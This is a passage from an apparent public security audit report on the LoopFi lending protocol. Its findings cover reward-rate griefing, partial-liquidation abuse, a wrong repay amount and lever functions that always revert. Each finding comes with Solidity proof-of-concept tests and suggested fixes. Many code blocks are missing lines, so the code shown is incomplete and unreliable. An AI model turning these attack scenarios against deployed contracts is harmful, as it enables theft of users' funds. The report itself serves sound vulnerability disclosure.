rewards[0] = address(rewardToken); uint256 len = _addLockDurations(); uint256 typeIndex = 0; stakeToken.mint(alice, amount); rewardToken.mint(minter, 100 ether); //the reward will be 100 ether rewardToken.mint(bob, 0.1 ether); //bob will have a very small amount multiFeeDistribution.setLPToken(address(stakeToken)); address incentivesController = address(controller1); address treasury = vm.addr(uint256(keccak256("treasury"))); multiFeeDistribution.setAddresses(IChefIncentivesController(incentivesController), treasury); vm.mockCall( incentivesController, abi.encodeWithSelector(IChefIncentivesController.afterLockUpdate.selector, alice), abi.encode(true) ); vm.prank(alice); stakeToken.approve(address(multiFeeDistribution), amount); vm.prank(alice); multiFeeDistribution.stake(amount, alice, 1); multiFeeDistribution.setMinters(minters); vm.prank(minter); multiFeeDistribution.addReward(address(rewardToken)); vm.prank(minter); rewardToken.transfer(address(multiFeeDistribution), 100 ether); vm.warp(block.timestamp); vm.prank(alice); multiFeeDistribution.getReward(rewards); vm.warp(block.timestamp + 20 days); vm.prank(alice); multiFeeDistribution.getReward(rewards); uint256 balanceBefore = rewardToken.balanceOf(address(alice)); uint256 dailyTokens1 = rewardToken.balanceOf(address(alice)) / 20; // the amount that alice has devided by the 20 days console.log(dailyTokens1); //These are the tokens that alice gets per day - 3.33e18 for (uint i = 0; i < 20; i++) { vm.prank(bob); rewardToken.transfer(address(multiFeeDistribution), 1); //bob transfers the dust amount vm.prank(bob); multiFeeDistribution.getReward(rewards); //calls get reward to update the rate vm.warp(block.timestamp + 1 days); vm.prank(alice); multiFeeDistribution.getReward(rewards); uint256 dailyTokens2 = rewardToken.balanceOf(address(alice)) - balanceBefore; balanceBefore = rewardToken.balanceOf(address(alice)); console.log("New daily token rewards:"); console.log(dailyTokens2); //1e18 vm.warp(block.timestamp + 3 days); //waits another three days } //at the end bob managed to make it 0.326912783616223995 per day and he can slow it down however he wants //What is more is that alice will have to wait for another 30 days! console.log(0.1 ether - rewardToken.balanceOf(address(bob))); //Bob spent 20(not 0.20e18) } // @IMPORTANT Performing the attack once instead of twenty times can result in decreasing the rate //and the duration will be reset, starting from beginning again! }
Koolex (judge) increased severity to High and commented:
Initially assessed as a Med, after further review, I believe it can fall into high category.
Note: For full discussion, see here.
Medium Risk Findings (39)
[M-01] Bringing a position from unsafe to safe by liquidation partially
Submitted by Evo
The CDPVault’s liquidation mechanism allows partial liquidations to temporarily bring unsafe positions back to a safe state. This can delay necessary liquidations if collateral prices continue to fall, potentially leading to increased risk and larger losses for the protocol.
Proof of Concept
The issue arises from liquidatePosition
function in the CDPVault contract. An attacker can exploit this to avoid full liquidation even when their position should be unsafe.
Break down the Scenario:
- Alice creates a position with 100 ether collateral and 60 ether debt.
- The collateral price drops, making Alice’s position unsafe.
- Bob performs a partial liquidation on Alice’s position.
- Alice’s position becomes temporarily safe due to the partial liquidation.
- The collateral price drops further, but a small liquidation attempt by Carol fails because the position is still considered safe.
- Only after an even further price drop can the position be liquidated again.
Alice can do the same flow to herself (self liqudation) to protect her position instead of maintaining it by increasing the colleteral, which costs less and goes against how the protocol is intended to work.
At function liquidatePosition
function liquidatePosition(address owner, uint256 repayAmount) external whenNotPaused {
// ... (validation and state loading)
if (_isCollateralized(calcTotalDebt(debtData), wmul(position.collateral, spotPrice_), config.liquidationRatio))
revert CDPVault__liquidatePosition_notUnsafe();
// ... (liquidation calculations)
position = _modifyPosition(owner, position, newDebt, newCumulativeIndex, -toInt256(takeCollateral), totalDebt);
// ... (state updates and transfers)
The issue occurs because after a partial liquidation, the position can become temporarily safe, preventing further immediate liquidations even if the collateral value continues to decrease.
Recommended Mitigation Steps
Flag positions as unsafe when they become unsafe, and revert them to safe status upon additional collateral deposits. However, this approach is suboptimal. A comprehensive reevaluation of the liquidation mechanism is necessary.
PoC confirmed. See here.
For the report in case needed:
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.19; import {TestBase, ERC20PresetMinterPauser} from "./TestBase.sol"; import {CDPVault} from "../../src/CDPVault.sol"; import {WAD, toInt256, wmul, wdiv} from "../../src/utils/Math.sol"; import {console} from "forge-std/console.sol"; import {StdCheats} from "forge-std/StdCheats.sol"; contract CDPVaultPartialLiquidationTest is TestBase { CDPVault internal vault; function setUp() public override { super.setUp(); token = new ERC20PresetMinterPauser("Token", "TKN"); vault = createCDPVault( token, 1_000_000 ether, // debt ceiling 0, // debt floor 1.25 ether, // liquidation ratio 1.0 ether, // liquidationPenalty 0.95 ether // liquidationDiscount ); createGaugeAndSetGauge(address(vault)); // Grant minter role to this contract bytes32 minterRole = token.MINTER_ROLE(); token.grantRole(minterRole, address(this)); mockWETH.grantRole(minterRole, address(this)); // Set initial price _updateSpot(1 ether); } function _updateSpot(uint256 price) internal { oracle.updateSpot(address(token), price); } function testUnsafePosition() public { // Create a position address alice = address(0x1); token.mint(alice, 100 ether); vm.startPrank(alice); token.approve(address(vault), 100 ether); vault.modifyCollateralAndDebt(alice, alice, alice, toInt256(100 ether), toInt256(60 ether)); vm.stopPrank(); // Record initial state (uint256 initialCollateral, uint256 initialDebt,,,,) = vault.positions(alice); console.log("Initial Collateral:", initialCollateral); console.log("Initial Debt:", initialDebt); console.log("Initial Price:", vault.spotPrice()); // Drop price to make position unsafe _updateSpot(0.7 ether); console.log("New Price:", vault.spotPrice()); // Partial liquidation address bob = address(0x2); mockWETH.mint(bob, 30 ether); vm.startPrank(bob); mockWETH.approve(address(vault), 30 ether); // console.log("Start liquidatePosition"); vault.liquidatePosition(alice, 30 ether); vm.stopPrank(); console.log("Partial Liquidation succeed"); // Log state after partial liquidation (uint256 collateralAfterPartial, uint256 debtAfterPartial,,,,) = vault.positions(alice); console.log("Collateral after partial liquidation:", collateralAfterPartial); console.log("Debt after partial liquidation:", debtAfterPartial); // Try to liquidate again (should fail as position is now safe) address charlie = address(0x3); mockWETH.mint(charlie, 1 ether); vm.startPrank(charlie); mockWETH.approve(address(vault), 1 ether); vm.expectRevert(CDPVault.CDPVault__liquidatePosition_notUnsafe.selector); vault.liquidatePosition(alice, 1 ether); vm.stopPrank(); console.log("Partial Liquidation failed"); // Verify final state (uint256 finalCollateral, uint256 finalDebt,,,,) = vault.positions(alice); console.log("Final Collateral:", finalCollateral); console.log("Final Debt:", finalDebt); } }
Initial Collateral: 100000000000000000000 Initial Debt: 60000000000000000000 Initial Price: 1000000000000000000 New Price: 700000000000000000 Partial Liquidation succeed Collateral after partial liquidation: 54887218045112781955 Debt after partial liquidation: 30000000000000000000 Partial Liquidation failed Final Collateral: 54887218045112781955 Final Debt: 30000000000000000000
[M-02] Wrong repayment amount used in PositionAction::_repay
, forcing users to unexpectedly lose funds
Submitted by 0xAlix2, also found by zhaojohnson, 0xbepresent, hash, and pkqs90
allows users to interact with their position in the CDP Vault through a proxy, on top of that it allows users to do certain actions before interacting with the position. An example of this is the PositionAction::deposit
, which allows users to:
- Deposit collateral tokens directly into the position.
- Swap arbitrary tokens for collateral and the deposit into the position.
This is handled in PositionAction::_deposit
, where if swap params exist, swap takes place and the returned amount is used when depositing into the position; else the user’s specified amount is used.
However, in PositionAction::_repay
, this is not the case, where even if a swap took place, the amount sent to the vault/position is still the one specified by the user; which is wrong and inconsistent with the other functions’ API. This can cause unexpected behaviors and reverts when users try to interact with PositionAction::repay
Proof of Concept
Add the following in src/test/integration/IntegrationTestBase.sol
, to create a balancer pool for the underlying token:
function _createBalancerUnderlyingTokenPool() internal returns (IComposableStablePool stablePool_) {
deal(address(DAI), address(this), 5_000_000 * 1e18);
deal(address(USDC), address(this), 5_000_000 * 1e6);
deal(address(USDT), address(this), 5_000_000 * 1e6);
underlyingToken.mint(address(this), 5_000_000 * 1e18);
uint256[] memory maxAmountsIn = new uint256[](4);
address[] memory assets = new address[](4);
assets[0] = address(DAI);
assets[1] = address(USDC);
assets[2] = address(USDT);
bool tokenPlaced;
address tempAsset;
for (uint256 i; i < assets.length; i++) {
if (!tokenPlaced) {
if (uint160(assets[i]) > uint160(address(underlyingToken))) {
tokenPlaced = true;
tempAsset = assets[i];
assets[i] = address(underlyingToken);
} else if (i == assets.length - 1) {
assets[i] = address(underlyingToken);
} else {
address placeholder = assets[i];
assets[i] = tempAsset;
tempAsset = placeholder;
for (uint256 i; i < assets.length; i++) {
maxAmountsIn[i] = ERC20(assets[i]).balanceOf(address(this));
ERC20(assets[i]).safeApprove(address(balancerVault), maxAmountsIn[i]);
stablePool_ = stablePoolFactory.create(
"Test Token Pool",
3e14, // swapFee (0.03%)
address(this) // owner
assets: assets,
maxAmountsIn: maxAmountsIn,
userData: abi.encode(JoinKind.INIT, maxAmountsIn),
fromInternalBalance: false
Add the following POC in src/test/integration/PositionAction20.t.sol
function test_wrongRepayAmount() public {
uint256 depositAmount = 1_000 ether;
uint256 borrowAmount = 500 ether;
uint256 USDCamount = 100e6;
deal(address(token), user, depositAmount);
deal(address(USDC), user, USDCamount);
bytes32[] memory poolIds = new bytes32[](1);
poolIds[0] = _createBalancerUnderlyingTokenPool().getPoolId();
address[] memory assets = new address[](2);
assets[0] = address(USDC);
assets[1] = address(underlyingToken);
// Approvals
token.approve(address(vault), type(uint256).max);
USDC.approve(address(userProxy), type(uint256).max);
underlyingToken.approve(address(userProxy), type(uint256).max);
// User deposits 1k ETH to vault
vault.deposit(address(userProxy), depositAmount);
// User borrows 500 ETH
CreditParams({amount: borrowAmount, creditor: user, auxSwap: emptySwap})
// Collateral == 1k ETH
// Debt == 500 ETH
// User has 500 USDC
(uint256 collateral, uint256 debt, , , , ) = vault.positions(address(userProxy));
assertEq(collateral, depositAmount);
assertEq(debt, borrowAmount);
assertEq(USDC.balanceOf(user), USDCamount);
// User repays his debt by swapping all his USDC to the underlying token
amount: 0,
creditor: user,
auxSwap: SwapParams({
swapProtocol: SwapProtocol.BALANCER,
swapType: SwapType.EXACT_IN,
assetIn: address(USDC),
amount: USDCamount,
limit: 0,
recipient: address(userProxy),
deadline: block.timestamp,
args: abi.encode(poolIds, assets)
// Collateral == 1k ETH
// Debt == 500 ETH
// User has 0 USDC
// User's USDC has been drained but no debt has been repaid
(collateral, debt, , , , ) = vault.positions(address(userProxy));
assertEq(collateral, depositAmount);
assertEq(debt, borrowAmount);
assertEq(USDC.balanceOf(user), 0);
Recommended Mitigation Steps
Update the moving amount of the underlying token after the swap, and use that value when repaying, which matches the logic in PositionAction::_deposit
, something similar to the following:
function _repay(address vault, address position, CreditParams calldata creditParams, PermitParams calldata permitParams) internal {
// transfer arbitrary token and swap to underlying token
uint256 amount = creditParams.amount;
if (creditParams.auxSwap.assetIn != address(0)) {
if (creditParams.auxSwap.recipient != address(this)) revert PositionAction__repay_InvalidAuxSwap();
amount = _transferAndSwap(creditParams.creditor, creditParams.auxSwap, permitParams);
} else {
if (creditParams.creditor != address(this)) {
// transfer directly from creditor
underlyingToken.forceApprove(address(vault), amount);
ICDPVault(vault).modifyCollateralAndDebt(position, address(this), address(this), 0, -toInt256(amount));
Assessed type
amarcu (LoopFi) confirmed via duplicate Issue #110
Koolex (judge) decreased severity to Medium
[M-03] SwapAction::getSwapToken
will return wrong swap token for balancer EXACT_OUT
Submitted by 0xAlix2
As known, when doing a Balancer EXACT_OUT
batch swap, assets should be passed in reverse order, this is thoroughly documented here.
Swapping in USDC for an exact amount out of BAL
swapType = `EXACT_OUT` and `assets` = [BAL, WETH, DAI, USDC]:
However, in SwapAction::getSwapToken
, for Balancer swaps it always returns the last asset in the assets array, which is correct for EXACT_IN
but wrong for EXACT_OUT
, where it should be the first asset in the assets array.
Proof of Concept
function test_wrongSwapTokenReturned() public {
uint256 amount = 200 ether;
deal(address(token), user, amount);
deal(address(underlyingToken), user, amount);
address[] memory assets = new address[](2);
assets[0] = address(underlyingToken);
assets[1] = address(token);
SwapParams memory swapParams = SwapParams({
swapProtocol: SwapProtocol.BALANCER,
swapType: SwapType.EXACT_OUT,
assetIn: address(token),
amount: 1 ether,
limit: 2 ether,
recipient: user,
deadline: block.timestamp,
args: abi.encode(weightedPoolIdArray, assets)
token.approve(address(swapAction), amount);
underlyingToken.approve(address(swapAction), amount);
uint256 tokenBalanceBefore = token.balanceOf(address(user));
uint256 underlyingTokenBalanceBefore = underlyingToken.balanceOf(address(user));
// Swap token for underlying token, using EXACT_OUT
swapAction.transferAndSwap(user, emptyPermitParams, swapParams);
uint256 tokenBalanceAfter = token.balanceOf(address(user));
uint256 underlyingTokenBalanceAfter = underlyingToken.balanceOf(address(user));
// Verify that the out token is the underlying token
assertLt(tokenBalanceAfter, tokenBalanceBefore);
assertGt(underlyingTokenBalanceAfter, underlyingTokenBalanceBefore);
// `getSwapToken` returns the out token as `token` which is wrong
assertEq(swapAction.getSwapToken(swapParams), address(token));
Recommended Mitigation Steps
Add the following in SwapAction::getSwapToken
if (swapParams.swapType == SwapType.EXACT_OUT) token = primarySwapPath[0];
else token = primarySwapPath[primarySwapPath.length - 1];
Assessed type
can not be up to a year as intended because it is hardcoded to 1749120350
Submitted by Kaysoft
AURA rewards will be distributed at a lesser time than a year. In fact, if the AuraVault.sol
contract is deployed 295 days after the completion of this audit, No aura rewards will be distributed. This is because the INFLATION_PROTECTION_TIME
is hardcoded to 1749120350
Proof of Concept
The Aura rewards is to be distributed within a year which is specified with the INFLATION_PROTECTION_TIME
constant. However, the INFLATION_PROTECTION_TIME
constant is hardcoded in the AuraVault.sol
contract to 1749120350
File: AuraVault.sol
66: uint256 private constant INFLATION_PROTECTION_TIME = 1749120350;
And there is a validation check to distribute reward only before this 1749120350
timestamp. At the time of writing this report, there are 310 days left and after the audit there will be less than 295 days left for Aura distribution, based on the hardcoded 1749120350
If this AuraVault.sol
is deployed 295 days from the time of writing this report, no AURA rewards will be distributed.
The issue lies in the fact that INFLATION_PROTECTION_TIME
constant is hardcoded to 1749120350
, which is already decreasing the duration of rewards from a year to zero.
File: AuraVault.sol
* @notice Allows anyone to claim accumulated rewards by depositing WETH instead
* @param amounts An array of reward amounts to be claimed ordered as [rewardToken, secondaryRewardToken]
* @param maxAmountIn The max amount of WETH to be sent to the Vault
function claim(uint256[] memory amounts, uint256 maxAmountIn) external returns (uint256 amountIn) {
// Claim rewards from Aura reward pool
// Compute assets amount to be sent to the Vault
VaultConfig memory _config = vaultConfig;
amountIn = _previewReward(amounts[0], amounts[1], _config);
// Transfer assets to Vault
require(amountIn <= maxAmountIn, "!Slippage");
IERC20(asset()).safeTransferFrom(msg.sender, address(this), amountIn);
// Compound assets into "asset" balance
IERC20(asset()).safeApprove(rewardPool, amountIn);
IPool(rewardPool).deposit(amountIn, address(this));
// Distribute BAL rewards
IERC20(BAL).safeTransfer(_config.lockerRewards, (amounts[0] * _config.lockerIncentive) / INCENTIVE_BASIS);
IERC20(BAL).safeTransfer(msg.sender, amounts[0]);
// Distribute AURA rewards
@> if (block.timestamp <= INFLATION_PROTECTION_TIME) {
IERC20(AURA).safeTransfer(_config.lockerRewards, (amounts[1] * _config.lockerIncentive) / INCENTIVE_BASIS);
IERC20(AURA).safeTransfer(msg.sender, amounts[1]);
} else {
IERC20(AURA).safeTransfer(_config.lockerRewards, IERC20(AURA).balanceOf(address(this)));
emit Claimed(msg.sender, amounts[0], amounts[1], amountIn);
Recommended Mitigation Steps
in the constructor instead of hardcoding it.
-- uint256 private constant INFLATION_PROTECTION_TIME = 1749120350;
++ uint256 private immutable INFLATION_PROTECTION_TIME;
) ERC4626(IERC20(asset_)) ERC20(tokenName_, tokenSymbol_) {
++ INFLATION_PROTECTION_TIME = block.timestamp + 365 days;
Assessed type
amarcu (LoopFi) acknowledged and commented:
Acknowledged but we will remove and not use the AuraVault.
[M-05] PositionAction4626::increaseLever
will always revert
Submitted by 0xAlix2, also found by web3km, zhaojohnson, Nyx, 0xbepresent, joaovwfreire, hash, pkqs90, and nnez
Users can use PositionAction::increaseLever
to increase their positions’ leverage, i.e., increasing both the collateral and debt, by taking a flash loan and doing some swaps. At the end of the process, after swapping “borrow” tokens to underlying tokens they should be returned to the vault under the position’s “name”.
For ERC20 collateral positions, this is happening in PositionAction20::_onIncreaseLever
(that gets called in PositionAction::onFlashLoan
) which approves the vault to spend some amount and then returns the amount to be later sent using the following in PositionAction::onFlashLoan
// add collateral and debt
However, for ERC4626 collateral positions, PositionAction4626::_onIncreaseLever
is both approving the amount and depositing it into the vault under address(this)
which IS NOT the position’s proxy but PositionAction4626
contract as it is the flash loan callback function and isn’t delegated like increaseLever
. When _onIncreaseLever
finishes, it’ll try to deposit the collateral AGAIN in the vault using this; which will for sure revert, as the approval was spent and no funds are left to make the deposit.
This will cause PositionAction4626::increaseLever
to always revert and never work, blocking users from leveraging their positions.
Proof of Concept
contract PositionAction4626_Lever_Test is IntegrationTestBase {
using SafeERC20 for ERC20;
PRBProxy userProxy;
address user;
uint256 constant userPk = 0x12341234;
CDPVault vault;
StakingLPEth stakingLPEth;
PositionAction4626 positionAction;
PermitParams emptyPermitParams;
SwapParams emptySwap;
PoolActionParams emptyPoolActionParams;
bytes32[] weightedPoolIdArray;
function setUp() public override {
setGlobalDebtCeiling(15_000_000 ether);
stakingLPEth = new StakingLPEth(address(token), "Staking LP ETH", "sLPETH");
vault = createCDPVault(stakingLPEth, 5_000_000 ether, 0, 1.25 ether, 1.0 ether, 1.05 ether);
gauge.addQuotaToken(address(stakingLPEth), 10, 100);
user = vm.addr(0x12341234);
userProxy = PRBProxy(payable(address(prbProxyRegistry.deployFor(user))));
positionAction = new PositionAction4626(
oracle.updateSpot(address(token), 1 ether);
oracle.updateSpot(address(stakingLPEth), 1 ether);
function test_increaseLeverDOS() public {
uint256 amount = 200 ether;
deal(address(token), user, amount);
address[] memory assets = new address[](2);
assets[0] = address(underlyingToken);
assets[1] = address(token);
// Approvals
token.approve(address(stakingLPEth), amount);
stakingLPEth.approve(address(vault), amount);
// Deopsit token to get sLPETH
stakingLPEth.deposit(amount, user);
// Deposit sLPETH to vault
vault.deposit(address(userProxy), amount);
// Borrow underlying tokens
CreditParams({amount: amount / 2, creditor: user, auxSwap: emptySwap})
// Increase leverage will always revert
vm.expectRevert(bytes("ERC20: insufficient allowance"));
position: address(userProxy),
vault: address(vault),
collateralToken: address(stakingLPEth),
primarySwap: SwapParams({
swapProtocol: SwapProtocol.BALANCER,
swapType: SwapType.EXACT_IN,
assetIn: address(underlyingToken),
amount: amount / 2,
limit: 0,
recipient: address(positionAction),
deadline: block.timestamp,
args: abi.encode(weightedPoolIdArray, assets)
auxSwap: emptySwap,
auxAction: emptyPoolActionParams
Recommended Mitigation Steps
In PositionAction4626::_onIncreaseLever
, replace:
return ICDPVault(leverParams.vault).deposit(address(this), addCollateralAmount);
return addCollateralAmount;
Assessed type
[M-06] PoolAction::updateLeverJoin
wrongly updates assetsIn
array, leading to PositionAction4626::_onIncreaseLever
to always revert
Submitted by 0xAlix2, also found by NexusAudits
Users can use PositionAction4626
to interact with the corresponding vault using their opened positions. PositionAction4626
allows users to deposit/withdraw/leverage their positions, increaseLever
enables users to increase their positions’ collateral and debt. For the most part, it’s the same as for PositionAction20
, where users swap the lent borrow tokens for collateral tokens, and then deposit them into the position.
The only change is that PositionAction4626
allows users on top of that to join a Balancer pool with the swapped tokens. This is done in PositionAction4626::_onIncreaseLever
The main part that we care about is PoolAction::updateLeverJoin
which adds the upfront amount to the amounts in. The way Balancer works is that it accepts an array of “amounts in”, according to the tokens array where indices should match, BUT it should skip the BPT token, this is where the function messes up.
This is mainly done in the following loop:
for (uint256 i = 0; i < len; ) {
uint256 assetIndex = i - (skipIndex ? 1 : 0);
if (assets[i] == joinToken) {
maxAmountsIn[i] = joinAmount;
assetsIn[assetIndex] = joinAmount;
} else if (assets[i] == upFrontToken && assets[i] != poolToken) {
maxAmountsIn[i] = upfrontAmount;
assetsIn[assetIndex] = upfrontAmount;
} else {
skipIndex = skipIndex || assets[i] == poolToken;
unchecked {
The goal of the above loop is to add the upfront amount to the corresponding amountIn
. The protocol passes the poolToken
as the collaterals 4626’s underlying token, which is not always true. In most cases, it won’t match any of the tokens array. Because of this, the above for loop will be wrongly updating and overriding the assetsIn
This blocks users from increasing the leverage of their positions where the collateral is an ERC4626
Proof of Concept
In the below POC, we pass the following:
tokensIn = [49 ether, 0]
However, because of what’s mentioned above and the wrong “skipping” logic, the tokensIn
comes out as:
tokensIn = [49 ether, 49 ether]
contract PositionAction4626_Lever_Test is IntegrationTestBase {
using SafeERC20 for ERC20;
PRBProxy userProxy;
address user;
CDPVault vault;
StakingLPEth stakingLPEth;
PositionAction4626 positionAction;
PermitParams emptyPermitParams;
SwapParams emptySwap;
PoolActionParams emptyPoolActionParams;
bytes32[] weightedPoolIdArray;
address constant wstETH_bb_a_WETH_BPTl = 0x41503C9D499ddbd1dCdf818a1b05e9774203Bf46;
address constant wstETH = 0x7f39C581F595B53c5cb19bD0b3f8dA6c935E2Ca0;
address constant bbaweth = 0xbB6881874825E60e1160416D6C426eae65f2459E;
bytes32 constant poolId = 0x41503c9d499ddbd1dcdf818a1b05e9774203bf46000000000000000000000594;
function setUp() public override {
setGlobalDebtCeiling(15_000_000 ether);
token = ERC20PresetMinterPauser(wstETH);
stakingLPEth = new StakingLPEth(address(token), "Staking LP ETH", "sLPETH");
vault = createCDPVault(stakingLPEth, 5_000_000 ether, 0, 1.25 ether, 1.0 ether, 1.05 ether);
createGaugeAndSetGauge(address(vault), address(stakingLPEth));
user = vm.addr(0x12341234);
userProxy = PRBProxy(payable(address(prbProxyRegistry.deployFor(user))));
positionAction = new PositionAction4626(
weightedUnderlierPoolId = _createBalancerPool(address(token), address(underlyingToken)).getPoolId();
oracle.updateSpot(address(token), 1 ether);
oracle.updateSpot(address(stakingLPEth), 1 ether);
function test_updateLeverJoin_increaseLeverageDOS() public {
uint256 depositAmount = 200 ether;
uint256 borrowAmount = 100 ether;
deal(address(token), user, depositAmount);
address[] memory assets = new address[](2);
assets[0] = address(underlyingToken);
assets[1] = address(token);
token.approve(address(stakingLPEth), depositAmount);
stakingLPEth.approve(address(userProxy), depositAmount);
// Deposit `wstETH` to get `sLPETH`
stakingLPEth.deposit(depositAmount, user);
// Deposit `sLPETH` to vault
targetToken: address(stakingLPEth),
amount: depositAmount,
collateralizer: address(user),
auxSwap: emptySwap
// Borrow 100 ETH
CreditParams({amount: borrowAmount, creditor: user, auxSwap: emptySwap})
address[] memory tokens = new address[](3);
tokens[0] = wstETH_bb_a_WETH_BPTl;
tokens[1] = wstETH;
tokens[2] = bbaweth;
uint256[] memory maxAmountsIn = new uint256[](3);
maxAmountsIn[0] = 0;
maxAmountsIn[1] = borrowAmount / 2 - 1 ether;
maxAmountsIn[2] = 0;
uint256[] memory tokensIn = new uint256[](2);
tokensIn[0] = borrowAmount / 2 - 1 ether;
tokensIn[1] = 0;
// Increase the leverage of the position, reverts
// Swapping underlying tokens to collateral tokens, the joining a Balancer pool
position: address(userProxy),
vault: address(vault),
collateralToken: address(stakingLPEth),
primarySwap: SwapParams({
swapProtocol: SwapProtocol.BALANCER,
swapType: SwapType.EXACT_IN,
assetIn: address(underlyingToken),
amount: borrowAmount / 2,
limit: 0,
recipient: address(positionAction),
deadline: block.timestamp,
args: abi.encode(weightedPoolIdArray, assets)
auxSwap: emptySwap,
auxAction: PoolActionParams(
abi.encode(poolId, tokens, tokensIn, maxAmountsIn)
function _createBalancerPool(address t1, address t2) internal returns (IComposableStablePool pool_) {
uint256 amount = 5_000_000_000 ether;
deal(t1, address(this), amount);
deal(t2, address(this), amount);
uint256[] memory maxAmountsIn = new uint256[](2);
address[] memory assets = new address[](2);
assets[0] = t1;
uint256[] memory weights = new uint256[](2);
weights[0] = 500000000000000000;
weights[1] = 500000000000000000;
bool tokenPlaced;
address tempAsset;
for (uint256 i; i < assets.length; i++) {
if (!tokenPlaced) {
if (uint160(assets[i]) > uint160(t2)) {
tokenPlaced = true;
tempAsset = assets[i];
assets[i] = t2;
} else if (i == assets.length - 1) {
assets[i] = t2;
} else {
address placeholder = assets[i];
assets[i] = tempAsset;
tempAsset = placeholder;
for (uint256 i; i < assets.length; i++) {
maxAmountsIn[i] = ERC20(assets[i]).balanceOf(address(this));
ERC20(assets[i]).safeApprove(address(balancerVault), maxAmountsIn[i]);
pool_ = weightedPoolFactory.create(
3e14, // swapFee (0.03%)
address(this) // owner
assets: assets,
maxAmountsIn: maxAmountsIn,
userData: abi.encode(JoinKind.INIT, maxAmountsIn),
fromInternalBalance: false
function getForkBlockNumber() internal pure virtual override(IntegrationTestBase) returns (uint256) {
return 17870449; // Aug-08-2023 01:17:35 PM +UTC
Recommended Mitigation Steps
Set the poolToken
according to the Balancer’s vault and PoolId
, something to:
function updateLeverJoin(
PoolActionParams memory poolActionParams,
address joinToken,
address upFrontToken,
uint256 flashLoanAmount,
uint256 upfrontAmount
) external view returns (PoolActionParams memory outParams) {
outParams = poolActionParams;
if (poolActionParams.protocol == Protocol.BALANCER) {
(bytes32 poolId, address[] memory assets, uint256[] memory assetsIn, uint256[] memory maxAmountsIn) = abi
.decode(poolActionParams.args, (bytes32, address[], uint256[], uint256[]));
address poolToken = balancerVault.getPool(poolId);
uint256 len = assets.length;
// the offset is needed because of the BPT token that needs to be skipped from the join
bool skipIndex = false;
uint256 joinAmount = flashLoanAmount;
if (upFrontToken == joinToken) {
joinAmount += upfrontAmount;
// update the join parameters with the new amounts
for (uint256 i = 0; i < len; ) {
uint256 assetIndex = i - (skipIndex ? 1 : 0);
if (assets[i] == joinToken) {
maxAmountsIn[i] = joinAmount;
assetsIn[assetIndex] = joinAmount;
} else if (assets[i] == upFrontToken && assets[i] != poolToken) {
maxAmountsIn[i] = upfrontAmount;
assetsIn[assetIndex] = upfrontAmount;
} else {
skipIndex = skipIndex || assets[i] == poolToken;
unchecked {
// update the join parameters
outParams.args = abi.encode(poolId, assets, assetsIn, maxAmountsIn);
Assessed type
[M-07] PositionAction4626::_onDecreaseLever
wrongly updates tokenOut
forcing user’s funds to be stuck in the position action contract
Submitted by 0xAlix2, also found by pkqs90
Users can use PositionAction::decreaseLever
to decrease the leverage of their positions when the collateral is an ERC4626, that position action interacts with PositionAction4626::_onDecreaseLever
. With that, the protocol gives the ability to join/exit Balancer pools, leveraging down an ERC4626 position is handled in PositionAction4626::_onDecreaseLever
This first step is that tokenOut
is set to the redeemed 4626 amount; however, when auxAction
exists, (i.e. the user wants to exit a Balancer pool), the tokenOut
is updated to return the amount of the exit position, this poses multiple issues:
- If the token out from Balancer is not the same as 4626’s underlying this will wrongly update to another token’s amount.
- If the recipient is not in the position action contract, the tokens would be sent to another address, while it assumes that it received them.
- If the
token = 4626
’s underlying, the recipient is the user, and the amount of from Balancer is less than the redeemedtokenOut
, the contract would set thetokenOut
as the Balancer return amount, which is less than the originaltokenOut
. This will return the wrongtokenOut
, sending the user a residual amount less than the real amount (the POC below is for this scenario).
The user’s “extra” collateral amount will end up stuck in the position action contract forever.
Proof of Concept
The following test assuming 3 reported bugs are fixed, to workaround this:
- In
, replace:
uint256 withdrawnCollateral = ICDPVault(leverParams.vault).withdraw(address(this), subCollateral);
uint256 withdrawnCollateral = ICDPVault(leverParams.vault).withdraw(leverParams.position, subCollateral);
- In
, replace:
return ICDPVault(leverParams.vault).deposit(address(this), addCollateralAmount);
return addCollateralAmount;
- At the top of
, add:
poolToken = balancerVault.getPool(poolId);
POC Contract
contract PositionAction4626_Lever_Test is IntegrationTestBase {
using SafeERC20 for ERC20;
PRBProxy userProxy;
address user;
CDPVault vault;
StakingLPEth stakingLPEth;
PositionAction4626 positionAction;
PermitParams emptyPermitParams;
SwapParams emptySwap;
PoolActionParams emptyPoolActionParams;
bytes32[] weightedPoolIdArray;
address constant wstETH_bb_a_WETH_BPTl = 0x41503C9D499ddbd1dCdf818a1b05e9774203Bf46;
address constant wstETH = 0x7f39C581F595B53c5cb19bD0b3f8dA6c935E2Ca0;
address constant bbaweth = 0xbB6881874825E60e1160416D6C426eae65f2459E;
bytes32 constant poolId = 0x41503c9d499ddbd1dcdf818a1b05e9774203bf46000000000000000000000594;
function setUp() public override {
setGlobalDebtCeiling(15_000_000 ether);
token = ERC20PresetMinterPauser(wstETH);
stakingLPEth = new StakingLPEth(address(token), "Staking LP ETH", "sLPETH");
vault = createCDPVault(stakingLPEth, 5_000_000 ether, 0, 1.25 ether, 1.0 ether, 1.05 ether);
createGaugeAndSetGauge(address(vault), address(stakingLPEth));
user = vm.addr(0x12341234);
userProxy = PRBProxy(payable(address(prbProxyRegistry.deployFor(user))));
positionAction = new PositionAction4626(
weightedUnderlierPoolId = _createBalancerPool(address(token), address(underlyingToken)).getPoolId();
oracle.updateSpot(address(token), 1 ether);
oracle.updateSpot(address(stakingLPEth), 1 ether);
function test_wrongTokenOutAmount_decreaseLeverLossOfFunds() public {
uint256 depositAmount = 250 ether;
uint256 borrowAmount = 100 ether;
uint256 flashLoanAmount = borrowAmount / 2;
deal(address(token), user, depositAmount);
address[] memory assets = new address[](2);
assets[0] = address(underlyingToken);
assets[1] = address(token);
address[] memory tokens = new address[](3);
tokens[0] = wstETH_bb_a_WETH_BPTl;
tokens[1] = wstETH;
tokens[2] = bbaweth;
// Deposit `wstETH` to get `sLPETH`
// Deposit 250 `sLPETH` to vault
token.approve(address(stakingLPEth), depositAmount);
stakingLPEth.approve(address(userProxy), depositAmount);
stakingLPEth.deposit(depositAmount, user);
targetToken: address(stakingLPEth),
amount: depositAmount,
collateralizer: address(user),
auxSwap: emptySwap
// Borrow 100 ETH
CreditParams({amount: borrowAmount, creditor: user, auxSwap: emptySwap})
// Collateral is 250 ETH, debt is 100 ETH
(uint256 collateral, uint256 debt, , , , ) = vault.positions(address(userProxy));
assertEq(collateral, depositAmount);
assertEq(debt, borrowAmount);
// Increase leverage
// Takes a flash loan of 50 ETH borrow tokens (adds that as a debt)
// Swap the borrow tokens to collateral tokens, and join Balancer pool
